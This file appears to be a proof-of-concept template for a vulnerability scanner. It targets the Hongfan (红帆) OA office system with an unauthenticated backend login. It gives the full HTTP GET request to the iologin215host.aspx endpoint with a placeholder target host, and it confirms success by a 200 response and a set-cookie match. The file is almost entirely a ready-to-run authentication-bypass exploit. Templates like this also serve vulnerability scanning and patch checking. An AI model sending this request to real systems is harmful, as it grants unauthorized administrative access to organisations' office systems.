<DudePoc_Name>红帆 OA 未授权登录后台</DudePoc_Name>
<DudePoc_Description>红帆 OA 未授权登录后台</DudePoc_Description>
<DudePoc_SetHeader>
GET /iOffice/prg/interface/iologin215host.aspx HTTP/1.1
Host: $<AttackHost>$
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
Connection: close
Upgrade-Insecure-Requests: 1
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?(?:set-cookie|iologin215host.aspx)).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
